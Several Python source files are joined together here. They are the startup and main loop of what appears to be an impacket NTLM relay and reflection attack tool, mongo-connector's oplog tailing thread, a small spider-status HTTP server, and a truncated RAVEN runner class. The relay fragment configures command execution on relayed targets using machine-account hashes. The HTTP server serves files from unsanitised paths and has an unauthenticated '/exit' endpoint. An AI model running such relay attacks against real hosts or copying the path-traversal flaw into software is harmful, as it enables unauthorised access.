options = parser.parse_args()
except Exception as e:
logging.error(str(e))
sys.exit(1)
if options.codec is not None:
CODEC = options.codec
if options.debug is True:
logging.getLogger().setLevel(logging.DEBUG)
else:
logging.getLogger().setLevel(logging.INFO)
logging.getLogger('impacket.smbserver').setLevel(logging.ERROR)
if options.h is not None:
logging.info("Running in relay mode")
mode = 'RELAY'
targetSystem = options.h
else:
logging.info("Running in reflection mode")
targetSystem = None
mode = 'REFLECTION'
exeFile = options.e
Command = options.c
returnStatus = options.s
threads = set()
if options.socks is True:
# Start a SOCKS proxy in the background
s1 = SOCKS()
socks_thread = Thread(target=s1.serve_forever)
socks_thread.daemon = True
socks_thread.start()
threads.add(socks_thread)
for server in RELAY_SERVERS:
s = server(options.outputfile)
s.setTargets(targetSystem)
s.setExeFile(exeFile)
s.setCommand(Command)
s.setSocks(options.socks)
s.setReturnStatus(returnStatus)
s.setMode(mode, options.one_shot)
if options.machine_account is not None and options.machine_hashes is not None and options.domain is not None:
s.setDomainAccount( options.machine_account, options.machine_hashes, options.domain)
elif (options.machine_account is None and options.machine_hashes is None and options.domain is None) is False:
logging.error("You must specify machine-account/hashes/domain all together!")
sys.exit(1)
s.start()
threads.add(s)
print("")
logging.info("Servers started, waiting for connections")
while True:
try:
sys.stdin.read()
except KeyboardInterrupt:
logging.info('Quitting.. please wait')
if options.socks is True:
s1.shutdown()
for s in threads:
del(s)
sys.exit(1)
else:
pass
|
oplog_manager.py
|
# Copyright 2013-2014 MongoDB, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tails the oplog of a shard and returns entries
"""
import bson
import logging
try:
import Queue as queue
except ImportError:
import queue
import pymongo
import sys
import time
import threading
from mongo_connector import errors, util
from mongo_connector.constants import DEFAULT_BATCH_SIZE
from mongo_connector.gridfs_file import GridFSFile
from mongo_connector.util import log_fatal_exceptions, retry_until_ok
LOG = logging.getLogger(__name__)
class OplogThread(threading.Thread):
"""Thread that tails an oplog.
Calls the appropriate method on DocManagers for each relevant oplog entry.
"""
def __init__(self, primary_client, doc_managers,
oplog_progress_dict, mongos_client=None, **kwargs):
super(OplogThread, self).__init__()
self.batch_size = kwargs.get('batch_size', DEFAULT_BATCH_SIZE)
# The connection to the primary for this replicaSet.
self.primary_client = primary_client
# The connection to the mongos, if there is one.
self.mongos_client = mongos_client
# Are we allowed to perform a collection dump?
self.collection_dump = kwargs.get('collection_dump', True)
# The document manager for each target system.
# These are the same for all threads.
self.doc_managers = doc_managers
# Boolean describing whether or not the thread is running.
self.running = True
# Stores the timestamp of the last oplog entry read.
self.checkpoint = None
# A dictionary that stores OplogThread/timestamp pairs.
# Represents the last checkpoint for a OplogThread.
self.oplog_progress = oplog_progress_dict
# The set of namespaces to process from the mongo cluster.
self.namespace_set = kwargs.get('ns_set', [])
# The set of gridfs namespaces to process from the mongo cluster
self.gridfs_set = kwargs.get('gridfs_set', [])
# The dict of source namespaces to destination namespaces
self.dest_mapping = kwargs.get('dest_mapping', {})
# Whether the collection dump gracefully handles exceptions
self.continue_on_error = kwargs.get('continue_on_error', False)
# Set of fields to export
self.fields = kwargs.get('fields', [])
LOG.info('OplogThread: Initializing oplog thread')
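# The replica set oplog is the capped collection 'oplog.rs' in the 'local' database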
self.oplog = self.primary_client.local.oplog.rs
if not self.oplog.find_one():
err_msg = 'OplogThread: No oplog for thread:'
LOG.warning('%s %s' % (err_msg, self.primary_client))
@property
def fields(self):
return self._fields
@fields.setter
def fields(self, value):
if value:
self._fields = set(value)
# Always include _id field
self._fields.add('_id')
else:
self._fields = None
@property
def namespace_set(self):
return self._namespace_set
@namespace_set.setter
def namespace_set(self, namespace_set):
self._namespace_set = namespace_set
self.update_oplog_ns_set()
@property
def gridfs_set(self):
return self._gridfs_set
@gridfs_set.setter
def gridfs_set(self, gridfs_set):
self._gridfs_set = gridfs_set
self._gridfs_files_set = [ns + '.files' for ns in gridfs_set]
self.update_oplog_ns_set()
@property
def gridfs_files_set(self):
try:
return self._gridfs_files_set
except AttributeError:
return []
@property
def oplog_ns_set(self):
try:
return self._oplog_ns_set
except AttributeError:
return []
def update_oplog_ns_set(self):
self._oplog_ns_set = []
if self.namespace_set:
self._oplog_ns_set.extend(self.namespace_set)
self._oplog_ns_set.extend(self.gridfs_files_set)
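# Also watch each database's $cmd namespace (and admin.$cmd) so commands such as renames and drops are picked up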
self._oplog_ns_set.extend(set(
ns.split('.', 1)[0] + '.$cmd' for ns in self.namespace_set))
self._oplog_ns_set.append("admin.$cmd")
@log_fatal_exceptions
def run(self):
"""Start the oplog worker.
"""
LOG.debug("OplogThread: Run thread started")
while self.running is True:
LOG.debug("OplogThread: Getting cursor")
cursor, cursor_len = self.init_cursor()
# we've fallen too far behind
if cursor is None and self.checkpoint is not None:
err_msg = "OplogThread: Last entry no longer in oplog"
effect = "cannot recover!"
LOG.error('%s %s %s' % (err_msg, effect, self.oplog))
self.running = False
continue
if cursor_len == 0:
LOG.debug("OplogThread: Last entry is the one we "
"already processed. Up to date. Sleeping.")
time.sleep(1)
continue
LOG.debug("OplogThread: Got the cursor, count is %d"
% cursor_len)
last_ts = None
remove_inc = 0
upsert_inc = 0
update_inc = 0
try:
LOG.debug("OplogThread: about to process new oplog "
"entries")
while cursor.alive and self.running:
LOG.debug("OplogThread: Cursor is still"
" alive and thread is still running.")
for n, entry in enumerate(cursor):
LOG.debug("OplogThread: Iterating through cursor,"
" document number in this cursor is %d"
% n)
# Break out if this thread should stop
if not self.running:
break
# Don't replicate entries resulting from chunk moves
if entry.get("fromMigrate"):
continue
# Take fields out of the oplog entry that
# shouldn't be replicated. This may nullify
# the document if there's nothing to do.
if not self.filter_oplog_entry(entry):
continue
#sync the current oplog operation
operation = entry['op']
ns = entry['ns']
if '.' not in ns:
continue
coll = ns.split('.', 1)[1]
# Ignore system collections
if coll.startswith("system."):
continue
# Ignore GridFS chunks
if coll.endswith('.chunks'):
continue
is_gridfs_file = False
if coll.endswith(".files"):
if ns in self.gridfs_files_set:
ns = ns[:-len(".files")]
is_gridfs_file = True
else:
continue
# use namespace mapping if one exists
ns = self.dest_mapping.get(ns, ns)
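# Convert the BSON Timestamp into a single long so the doc managers get one sortable value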
timestamp = util.bson_ts_to_long(entry['ts'])
for docman in self.doc_managers:
try:
LOG.debug("OplogThread: Operation for this "
"entry is %s" % str(operation))
# Remove
if operation == 'd':
docman.remove(
entry['o']['_id'], ns, timestamp)
remove_inc += 1
# Insert
elif operation == 'i': # Insert
# Retrieve inserted document from
# 'o' field in oplog record
doc = entry.get('o')
# Extract timestamp and namespace
if is_gridfs_file:
db, coll = ns.split('.', 1)
gridfile = GridFSFile(
self.primary_client[db][coll],
doc)
docman.insert_file(
gridfile, ns, timestamp)
else:
docman.upsert(doc, ns, timestamp)
upsert_inc += 1
# Update
elif operation == 'u':
docman.update(entry['o2']['_id'],
entry['o'],
ns, timestamp)
update_inc += 1
# Command
elif operation == 'c':
# use unmapped namespace
doc = entry.get('o')
docman.handle_command(doc,
entry['ns'],
timestamp)
except errors.OperationFailed:
LOG.exception(
"Unable to process oplog document %r"
% entry)
except errors.ConnectionFailed:
LOG.exception(
"Connection failed while processing oplog "
"document %r" % entry)
if (remove_inc + upsert_inc + update_inc) % 1000 == 0:
LOG.debug(
"OplogThread: Documents removed: %d, "
"inserted: %d, updated: %d so far" % (
remove_inc, upsert_inc, update_inc))
LOG.debug("OplogThread: Doc is processed.")
last_ts = entry['ts']
# update timestamp per batch size
# n % -1 (default for self.batch_size) == 0 for all n
if n % self.batch_size == 1 and last_ts is not None:
self.checkpoint = last_ts
self.update_checkpoint()
# update timestamp after running through oplog
if last_ts is not None:
LOG.debug("OplogThread: updating checkpoint after"
"processing new oplog entries")
self.checkpoint = last_ts
self.update_checkpoint()
except (pymongo.errors.AutoReconnect,
pymongo.errors.OperationFailure,
pymongo.errors.ConfigurationError):
LOG.exception(
"Cursor closed due to an exception. "
"Will attempt to reconnect.")
# update timestamp before attempting to reconnect to MongoDB,
# after being join()'ed, or if the cursor closes
if last_ts is not None:
LOG.debug("OplogThread: updating checkpoint after an "
"Exception, cursor closing, or join() on this"
"thread.")
self.checkpoint = last_ts
self.update_checkpoint()
LOG.debug("OplogThread: Sleeping. Documents removed: %d, "
"upserted: %d, updated: %d"
% (remove_inc, upsert_inc, update_inc))
time.sleep(2)
def join(self):
"""Stop this thread from managing the oplog.
"""
LOG.debug("OplogThread: exiting due to join call.")
self.running = False
threading.Thread.join(self)
def filter_oplog_entry(self, entry):
"""Remove fields from an oplog entry that should not be replicated."""
if not self._fields:
return entry
def pop_excluded_fields(doc):
for key in set(doc) - self._fields:
doc.pop(key)
entry_o = entry['o']
# 'i' indicates an insert. 'o' field is the doc to be inserted.
if entry['op'] == 'i':
pop_excluded_fields(entry_o)
# 'u' indicates an update. The 'o' field describes an update spec
# if '$set' or '$unset' are present.
elif entry['op'] == 'u' and ('$set' in entry_o or '$unset' in entry_o):
pop_excluded_fields(entry_o.get("$set", {}))
pop_excluded_fields(entry_o.get("$unset", {}))
# not allowed to have empty $set/$unset, so remove if empty
if "$set" in entry_o and not entry_o['$set']:
entry_o.pop("$set")
if "$unset" in entry_o and not entry_o['$unset']:
entry_o.pop("$unset")
if not entry_o:
return None
# 'u' indicates an update. The 'o' field is the replacement document
# if no '$set' or '$unset' are present.
elif entry['op'] == 'u':
pop_excluded_fields(entry_o)
return entry
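# Illustrative note (assumed example, not from the original module): with fields={'a'}, an insert
# entry {'op': 'i', 'o': {'a': 1, 'b': 2}} is trimmed to {'a': 1} (plus '_id'), while an update spec
# whose '$set'/'$unset' touch only excluded fields collapses to None and is skipped by the caller.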
def get_oplog_cursor(self, timestamp=None):
"""Get a cursor to the oplog after the given timestamp, filtering
entries not in the namespace set.
If no timestamp is specified, returns a cursor to the entire oplog.
"""
query = {}
if self.oplog_ns_set:
query['ns'] = {'$in': self.oplog_ns_set}
if timestamp is None:
cursor = self.oplog.find(
query,
tailable=True, await_data=True)
else:
query['ts'] = {'$gte': timestamp}
cursor = self.oplog.find(
query, tailable=True, await_data=True)
# Applying 8 as the mask to the cursor enables OplogReplay
cursor.add_option(8)
return cursor
def dump_collection(self):
"""Dumps collection into the target system.
This method is called when we're initializing the cursor and have no
configs i.e. when we're starting for the first time.
"""
dump_set = self.namespace_set or []
LOG.debug("OplogThread: Dumping set of collections %s " % dump_set)
#no namespaces specified
if not self.namespace_set:
db_list = retry_until_ok(self.primary_client.database_names)
for database in db_list:
if database == "config" or database == "local":
continue
coll_list = retry_until_ok(
self.primary_client[database].collection_names)
for coll in coll_list:
# ignore system collections
if coll.startswith("system."):
continue
# ignore gridfs collections
if coll.endswith(".files") or coll.endswith(".chunks"):
continue
namespace = "%s.%s" % (database, coll)
dump_set.append(namespace)
timestamp = util.retry_until_ok(self.get_last_oplog_timestamp)
if timestamp is None:
return None
long_ts = util.bson_ts_to_long(timestamp)
def docs_to_dump(namespace):
database, coll = namespace.split('.', 1)
last_id = None
attempts = 0
# Loop to handle possible AutoReconnect
while attempts < 60:
target_coll = self.primary_client[database][coll]
if not last_id:
cursor = util.retry_until_ok(
target_coll.find,
fields=self._fields,
sort=[("_id", pymongo.ASCENDING)]
)
else:
cursor = util.retry_until_ok(
target_coll.find,
{"_id": {"$gt": last_id}},
fields=self._fields,
sort=[("_id", pymongo.ASCENDING)]
)
try:
for doc in cursor:
if not self.running:
raise StopIteration
last_id = doc["_id"]
yield doc
break
except (pymongo.errors.AutoReconnect,
pymongo.errors.OperationFailure):
attempts += 1
time.sleep(1)
def upsert_each(dm):
num_inserted = 0
num_failed = 0
for namespace in dump_set:
for num, doc in enumerate(docs_to_dump(namespace)):
if num % 10000 == 0:
LOG.debug("Upserted %d docs." % num)
try:
mapped_ns = self.dest_mapping.get(namespace, namespace)
dm.upsert(doc, mapped_ns, long_ts)
num_inserted += 1
except Exception:
if self.continue_on_error:
LOG.exception(
"Could not upsert document: %r" % doc)
num_failed += 1
else:
raise
LOG.debug("Upserted %d docs" % num_inserted)
if num_failed > 0:
LOG.error("Failed to upsert %d docs" % num_failed)
def upsert_all(dm):
try:
for namespace in dump_set:
mapped_ns = self.dest_mapping.get(namespace, namespace)
dm.bulk_upsert(docs_to_dump(namespace), mapped_ns, long_ts)
except Exception:
if self.continue_on_error:
LOG.exception("OplogThread: caught exception"
" during bulk upsert, re-upserting"
" documents serially")
upsert_each(dm)
else:
raise
def do_dump(dm, error_queue):
try:
# Dump the documents, bulk upsert if possible
if hasattr(dm, "bulk_upsert"):
LOG.debug("OplogThread: Using bulk upsert function for "
"collection dump")
upsert_all(dm)
else:
LOG.debug(
"OplogThread: DocManager %s has no "
"bulk_upsert method. Upserting documents "
"serially for collection dump." % str(dm))
upsert_each(dm)
# Dump GridFS files
for gridfs_ns in self.gridfs_set:
db, coll = gridfs_ns.split('.', 1)
mongo_coll = self.primary_client[db][coll]
dest_ns = self.dest_mapping.get(gridfs_ns, gridfs_ns)
for doc in docs_to_dump(gridfs_ns + '.files'):
gridfile = GridFSFile(mongo_coll, doc)
dm.insert_file(gridfile, dest_ns, long_ts)
except:
# Likely exceptions:
# pymongo.errors.OperationFailure,
# mongo_connector.errors.ConnectionFailed
# mongo_connector.errors.OperationFailed
error_queue.put(sys.exc_info())
# Extra threads (if any) that assist with collection dumps
dumping_threads = []
# Did the dump succeed for all target systems?
dump_success = True
# Holds any exceptions we can't recover from
errors = queue.Queue()
if len(self.doc_managers) == 1:
do_dump(self.doc_managers[0], errors)
else:
# Slight performance gain breaking dump into separate
# threads if > 1 replication target
for dm in self.doc_managers:
t = threading.Thread(target=do_dump, args=(dm, errors))
dumping_threads.append(t)
t.start()
# cleanup
for t in dumping_threads:
t.join()
# Print caught exceptions
try:
while True:
LOG.critical('Exception during collection dump',
exc_info=errors.get_nowait())
dump_success = False
except queue.Empty:
pass
if not dump_success:
err_msg = "OplogThread: Failed during dump collection"
effect = "cannot recover!"
LOG.error('%s %s %s' % (err_msg, effect, self.oplog))
self.running = False
return None
return timestamp
def get_last_oplog_timestamp(self):
"""Return the timestamp of the latest entry in the oplog.
"""
if not self.oplog_ns_set:
curr = self.oplog.find().sort(
'$natural', pymongo.DESCENDING
).limit(1)
else:
curr = self.oplog.find(
{'ns': {'$in': self.oplog_ns_set}}
).sort('$natural', pymongo.DESCENDING).limit(1)
if curr.count(with_limit_and_skip=True) == 0:
return None
LOG.debug("OplogThread: Last oplog entry has timestamp %d."
% curr[0]['ts'].time)
return curr[0]['ts']
def init_cursor(self):
"""Position the cursor appropriately.
The cursor is set to either the beginning of the oplog, or
wherever it was last left off.
Returns the cursor and the number of documents left in the cursor.
"""
timestamp = self.read_last_checkpoint()
if timestamp is None:
if self.collection_dump:
# dump collection and update checkpoint
timestamp = self.dump_collection()
if timestamp is None:
return None, 0
else:
# Collection dump disabled:
# return cursor to beginning of oplog.
cursor = self.get_oplog_cursor()
self.checkpoint = self.get_last_oplog_timestamp()
self.update_checkpoint()
return cursor, retry_until_ok(cursor.count)
self.checkpoint = timestamp
self.update_checkpoint()
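# Retry for up to 60 attempts (sleeping 1s on a failed read) in case the cursor is invalidated
# between the count() call and the first fetch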
for i in range(60):
cursor = self.get_oplog_cursor(timestamp)
cursor_len = retry_until_ok(cursor.count)
if cursor_len == 0:
# rollback, update checkpoint, and retry
LOG.debug("OplogThread: Initiating rollback from "
"get_oplog_cursor")
self.checkpoint = self.rollback()
self.update_checkpoint()
return self.init_cursor()
# try to get the first oplog entry
try:
first_oplog_entry = retry_until_ok(next, cursor)
except StopIteration:
# It's possible for the cursor to become invalid
# between the cursor.count() call and now
time.sleep(1)
continue
# first entry should be last oplog entry processed
cursor_ts_long = util.bson_ts_to_long(
first_oplog_entry.get("ts"))
given_ts_long = util.bson_ts_to_long(timestamp)
if cursor_ts_long > given_ts_long:
# first entry in oplog is beyond timestamp
# we've fallen behind
return None, 0
# first entry has been consumed
return cursor, cursor_len - 1
else:
raise errors.MongoConnectorError(
"Could not initialize oplog cursor.")
def update_checkpoint(self):
"""Store the current checkpoint in the oplog progress dictionary.
"""
if self.checkpoint is not None:
with self.oplog_progress as oplog_prog:
oplog_dict = oplog_prog.get_dict()
oplog_dict[str(self.oplog)] = self.checkpoint
LOG.debug("OplogThread: oplog checkpoint updated to %s" %
str(self.checkpoint))
else:
LOG.debug("OplogThread: no checkpoint to update.")
def read_last_checkpoint(self):
"""Read the last checkpoint from the oplog progress dictionary.
"""
oplog_str = str(self.oplog)
ret_val = None
with self.oplog_progress as oplog_prog:
oplog_dict = oplog_prog.get_dict()
if oplog_str in oplog_dict.keys():
ret_val = oplog_dict[oplog_str]
LOG.debug("OplogThread: reading last checkpoint as %s " %
str(ret_val))
return ret_val
def rollback(self):
"""Rollback target system to consistent state.
The strategy is to find the latest timestamp in the target system and
the largest timestamp in the oplog less than the latest target system
timestamp. This defines the rollback window and we just roll these
back until the oplog and target system are in consistent states.
"""
# Find the most recently inserted document in each target system
LOG.debug("OplogThread: Initiating rollback sequence to bring "
"system into a consistent state.")
last_docs = []
for dm in self.doc_managers:
dm.commit()
last_docs.append(dm.get_last_doc())
# Of these documents, which is the most recent?
last_inserted_doc = max(last_docs,
key=lambda x: x["_ts"] if x else float("-inf"))
# Nothing has been replicated. No need to rollback target systems
if last_inserted_doc is None:
return None
# Find the oplog entry that touched the most recent document.
# We'll use this to figure where to pick up the oplog later.
target_ts = util.long_to_bson_ts(last_inserted_doc['_ts'])
last_oplog_entry = util.retry_until_ok(
self.oplog.find_one,
{'ts': {'$lte': target_ts}},
sort=[('$natural', pymongo.DESCENDING)]
)
LOG.debug("OplogThread: last oplog entry is %s"
% str(last_oplog_entry))
# The oplog entry for the most recent document doesn't exist anymore.
# If we've fallen behind in the oplog, this will be caught later
if last_oplog_entry is None:
return None
# rollback_cutoff_ts happened *before* the rollback
rollback_cutoff_ts = last_oplog_entry['ts']
start_ts = util.bson_ts_to_long(rollback_cutoff_ts)
# timestamp of the most recent document on any target system
end_ts = last_inserted_doc['_ts']
for dm in self.doc_managers:
rollback_set = {} # this is a dictionary of ns:list of docs
# group potentially conflicted documents by namespace
for doc in dm.search(start_ts, end_ts):
if doc['ns'] in rollback_set:
rollback_set[doc['ns']].append(doc)
else:
rollback_set[doc['ns']] = [doc]
# retrieve these documents from MongoDB, either updating
# or removing them in each target system
for namespace, doc_list in rollback_set.items():
# Get the original namespace
original_namespace = namespace
for source_name, dest_name in self.dest_mapping.items():
if dest_name == namespace:
original_namespace = source_name
database, coll = original_namespace.split('.', 1)
obj_id = bson.objectid.ObjectId
bson_obj_id_list = [obj_id(doc['_id']) for doc in doc_list]
# Use connection to whole cluster if in sharded environment.
client = self.mongos_client or self.primary_client
to_update = util.retry_until_ok(
client[database][coll].find,
{'_id': {'$in': bson_obj_id_list}},
fields=self.fields
)
#doc list are docs in target system, to_update are
#docs in mongo
doc_hash = {} # hash by _id
for doc in doc_list:
doc_hash[bson.objectid.ObjectId(doc['_id'])] = doc
to_index = []
def collect_existing_docs():
for doc in to_update:
if doc['_id'] in doc_hash:
del doc_hash[doc['_id']]
to_index.append(doc)
retry_until_ok(collect_existing_docs)
#delete the inconsistent documents
LOG.debug("OplogThread: Rollback, removing inconsistent "
"docs.")
remov_inc = 0
for document_id in doc_hash:
try:
dm.remove(document_id, namespace,
util.bson_ts_to_long(rollback_cutoff_ts))
remov_inc += 1
                        LOG.debug(
                            "OplogThread: Rollback, removed %r " % document_id)
except errors.OperationFailed:
LOG.warning(
"Could not delete document during rollback: %r "
"This can happen if this document was already "
"removed by another rollback happening at the "
"same time." % doc
)
LOG.debug("OplogThread: Rollback, removed %d docs." %
remov_inc)
#insert the ones from mongo
LOG.debug("OplogThread: Rollback, inserting documents "
"from mongo.")
insert_inc = 0
fail_insert_inc = 0
for doc in to_index:
try:
insert_inc += 1
dm.upsert(doc,
self.dest_mapping.get(namespace, namespace),
util.bson_ts_to_long(rollback_cutoff_ts))
except errors.OperationFailed:
fail_insert_inc += 1
LOG.exception("OplogThread: Rollback, Unable to "
"insert %r" % doc)
LOG.debug("OplogThread: Rollback, Successfully inserted %d "
" documents and failed to insert %d"
" documents. Returning a rollback cutoff time of %s "
% (insert_inc, fail_insert_inc, str(rollback_cutoff_ts)))
return rollback_cutoff_ts
|
httpsever.py
|
# coding:utf-8
########
# Reference: https://www.cnblogs.com/xinyangsdut/p/9099623.html
########
import socket
import re
import psutil
import json
import os
import time
from threading import Thread
from queue import Queue
# Root directory for static files
HTML_ROOT_DIR = "./html"
os.chdir(os.path.dirname(__file__))
class HTTPServer(object):
def __init__(self):
self.server_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.server_socket.setsockopt(
socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
self.tcp_spider_connection = 0
self.spider_status = {}
self.exit_mes = False
self.content_type ={
"css":r"text/css",
"html":r"text/html",
"htm":r"text/html",
"js":r"application/x-javascript",
"ico":r"image/x-icon",
"png":r"image/png",
"jpg":r"image/jpeg"
}
def start(self):
self.server_socket.listen(128)
while not self.exit_mes:
client_socket, client_address = self.server_socket.accept()
print("[%s, %s]用户连接上了" % client_address)
handle_client_process = Thread(
target=self.handle_client, args=(client_socket,client_address))
handle_client_process.start()
#client_socket.close()
#print(self.spider_status)
def handle_client(self, client_socket,client_address):
"""
        Handle a client request
"""
        # Read the request data sent by the client
request_data = client_socket.recv(1024).decode()
request_lines = request_data.splitlines()
if len(request_lines) > 0:
            # Parse the request line
request_start_line = request_lines[0]
else:
client_socket.close()
return
if "HTTP" in request_start_line:
self.handle_http(request_lines,request_start_line,client_socket,client_address)
elif "BilispiderSocket" in request_start_line:
self.handle_spidersocket(request_lines,request_start_line,client_socket,client_address)
else:
client_socket.send(b"NON_SUPPORT")
client_socket.close()
#print("response data:\n", response)
def handle_spidersocket(self,request_lines,request_start_line,client_socket,client_address):
self.spidersocket = BilispiderSocket(client_socket,client_address)
self.tcp_spider_connection += 1
self.spidersocket.receive()
self.tcp_spider_connection -= 1
# try:
# while True:
# msg = client_socket.recv(1024)
# client_socket.send(msg)
# except ConnectionResetError:
        #         print("connection lost")
def handle_http(self,request_lines,request_start_line,client_socket,client_address):
        # Build the response headers
response_headers = "Server: BiliSpider server\r\n"\
"Access-Control-Allow-Origin:*\r\n"\
"Access-Control-Allow-Method:POST,GET\r\n"
        # Extract the file name requested by the client
file_name = re.match(
r"\w+ +(/[^ ]*) ", request_start_line).group(1)
if "/" == file_name:
file_name = "/index.html"
if len(file_name) >= 5 and file_name[:5] == '/data':
response_start_line = "HTTP/1.1 200 OK\r\n"
response_headers += "Content-Type: application/json\r\n"
response_body = json.dumps({'sys': self.get_sysinfo(),
'spider': self.get_status(),
},indent=4)
elif len(file_name) >= 5 and file_name[:5] == '/post':
self.set_status(json.loads(request_lines[-1]))
response_body = 'received!'
response_start_line = "HTTP/1.1 200 OK\r\n"
elif len(file_name) >= 5 and file_name[:5] == '/exit':
response_body = 'received exit command!'
self.exit_mes = True
from time import sleep
response_start_line = "HTTP/1.1 200 OK\r\n"
#response_headers = "Server: BiliSpider server\r\n"
else:
            # Open the file and read its contents
try:
file = open(HTML_ROOT_DIR + file_name, "rb")
except IOError:
response_start_line = "HTTP/1.1 404 Not Found\r\n"
#response_headers = "Server: BiliSpider server\r\n"
response_body = "The file is not found!"
else:
file_data = file.read()
file.close()
                # Build the response data
response_headers += "Content-Type: " + self.content_type.get(file_name.rsplit('.',1)[1],r"application/octet-stream") + "\r\n"
response_start_line = "HTTP/1.1 200 OK\r\n"
#response_headers = "Server: BiliSpider server\r\n"
response_body = file_data
if isinstance(response_body,bytes):
pass
elif isinstance(response_body,str):
response_body = response_body.encode('utf-8')
else:
response_body = str(response_body).encode('utf-8')
response = bytes(response_start_line + response_headers + "\r\n" , 'utf-8')+ response_body
        # Send the response back to the client
client_socket.send(response)
        # Close the client connection
client_socket.close()
def get_status(self):
if self.tcp_spider_connection:
msg_id = self.spidersocket.send("get_status",True)
try:
return(json.loads(self.spidersocket.get_response(msg_id)))
except:
print("tcp通讯失败")
return self.spider_status
else:
return self.spider_status
def bind(self, port):
self.server_socket.bind(("", port))
@classmethod
    def get_sysinfo(cls):
        # Get memory info
mem_keys = ('total', 'available', 'percent', 'used', 'free')
mem_svmem = psutil.virtual_memory()
mem_info = {}
for i in range(len(mem_keys)):
mem_info[mem_keys[i]] = mem_svmem[i]
        # Get CPU usage
cpu_info = {'usage': psutil.cpu_percent(percpu=True)}
        # Get network I/O counters
net_keys = ('bytes_sent', 'bytes_recv', 'packets_sent',
'packets_recv', 'errin', 'errout', 'dropin', 'dropout')
net_snetio = psutil.net_io_counters()
net_info = {}
for i in range(len(net_keys)):
net_info[net_keys[i]] = net_snetio[i]
sys_info = {'mem': mem_info, 'cpu': cpu_info, 'net': net_info}
return sys_info
def set_status(self,status):
self.spider_status.update(status)
class BilispiderSocket(object):
def __init__(self,client_socket,client_address):
self.client_socket = client_socket
self.client_address = client_address
self.message = {}
self.message_id = set()
print("hello")
self.send("hello")
print("hello")
def receive(self):
while True:
try:
data = self.client_socket.recv(1024).decode()
except ConnectionResetError:
print("与{}连接中断".format(self.client_address[0]))
return
request_start_line,request_content = data.split("\n",1)
if "BilispiderSocket" not in request_start_line:
self.send("not support")
else:
msg_id = int(request_start_line.split("/")[-1])
if msg_id in self.message:
self.message[msg_id].put(request_content)
Thread(target=self.handle_msg,args=(request_content,msg_id)).start()
#msg_id = self.send(request_content,response=True)
# content = self.get_response(msg_id)
# self.send(msg_id+content)
def send(self,msg,response = 0):
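        # Message framing used by this class: a start line of the form
        # "BilispiderSocket /<msg_id> " followed by a newline and the payload.
        # msg_id 0 means no reply is expected; a non-zero id is registered in
        # self.message so get_response() can match the peer's answer to it.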
if response:
msg_id = int(time.time()*10000)%10000000000
self.message_id.add(msg_id)
self.message[msg_id] = Queue(1)
else:
msg_id = 0
data = "BilispiderSocket /{} \n{}".format(msg_id,msg).encode()
Thread(target=self.client_socket.send,args=(data,),name="socketsender").start()
return msg_id
def get_response(self,msg_id):
if msg_id in self.message_id:
self.message_id.remove(msg_id)
else:
return ""
# while True:
# if msg_id in self.message:
# return self.message.pop(msg_id)
# else:
# time.sleep(0.1)
msg = self.message[msg_id].get(timeout=2)
del self.message[msg_id]
return msg
def handle_msg(self,content,msg_id):
if not msg_id:
print(content)
msg_id = self.send(content,response=True)
print(self.get_response(msg_id))
self.send("received")
else:
print(msg_id)
def close(self):
self.client_socket.close()
def main(port=1214):
http_server = HTTPServer()
http_server.bind(port)
http_server.start()
if __name__ == "__main__":
main()
|
SharedMemoryRunner.py
|
# Copyright 2017 Battelle Energy Alliance, LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Created on September 12, 2016
"""
#for future compatibility with Python 3--------------------------------------------------------------
from __future__ import division, print_function, unicode_literals, absolute_import
import warnings
warnings.simplefilter('default',DeprecationWarning)
#End compatibility block for Python 3----------------------------------------------------------------
#External Modules------------------------------------------------------------------------------------
import collections
import subprocess
# try : import Queue as queue
# except ImportError: import queue
import os
import signal
import copy
import abc
import time
import ctypes
import inspect
#import logging, logging.handlers
import threading
#External Modules End--------------------------------------------------------------------------------
#Internal Modules------------------------------------------------------------------------------------
from utils import utils
from BaseClasses import BaseType
import MessageHandler
from .InternalRunner import InternalRunner
#Internal Modules End--------------------------------------------------------------------------------
class SharedMemoryRunner(InternalRunner):
"""
Class for running internal objects in a threaded fashion using the built-in
threading library
"""
def __init__(self, messageHandler, args, functionToRun, identifier=None, metadata=None, uniqueHandler = "any", profile = False):
"""
Init method
@ In, messageHandler, MessageHandler object, the global RAVEN message
handler object
@ In, args, dict, this is a list of arguments that will be passed as
function parameters into whatever method is stored in functionToRun.
e.g., functionToRun(*args)
@ In, functionToRun, method or function, function that needs to be run
@ In, identifier, string, optional, id of this job
@ In, metadata, dict, optional, dictionary of metadata associated with
this run
@ In, uniqueHandler, string, optional, it is a special keyword attached to
this runner. For example, if present, to retrieve this runner using the
method jobHandler.getFinished, the uniqueHandler needs to be provided.
If uniqueHandler == 'any', every "client" can get this runner
@ In, profile, bool, optional, if True then at deconstruction timing statements will be printed
@ Out, None
"""
## First, allow the base class handle the commonalities
# we keep the command here, in order to have the hook for running exec code into internal models
super(SharedMemoryRunner, self).__init__(messageHandler, args, functionToRun, identifier, metadata, uniqueHandler, profile)
## Other parameters manipulated internally
self.subque = collections.deque()
#self.subque = queue.Queue()
self.skipOnCopy.append('subque')
def isDone(self):
"""
Method to check if the calculation associated with this Runner is finished
@ In, None
@ Out, finished, bool, is it finished?
"""
## If the process has not been started yet, then return False
if not self.started:
return False
if self.thread is None:
return True
else:
return not self.thread.is_alive()
def getReturnCode(self):
"""
Returns the return code from running the code. If return code not yet
set, then set it.
@ In, None
@ Out, returnCode, int, the return code of this evaluation
"""
if not self.hasBeenAdded:
self._collectRunnerResponse()
## Is this necessary and sufficient for all failed runs?
if len(self.subque) == 0 and self.runReturn is None:
self.runReturn = None
self.returnCode = -1
return self.returnCode
def _collectRunnerResponse(self):
"""
Method to add the process response in the internal variable (pointer)
self.runReturn
@ In, None
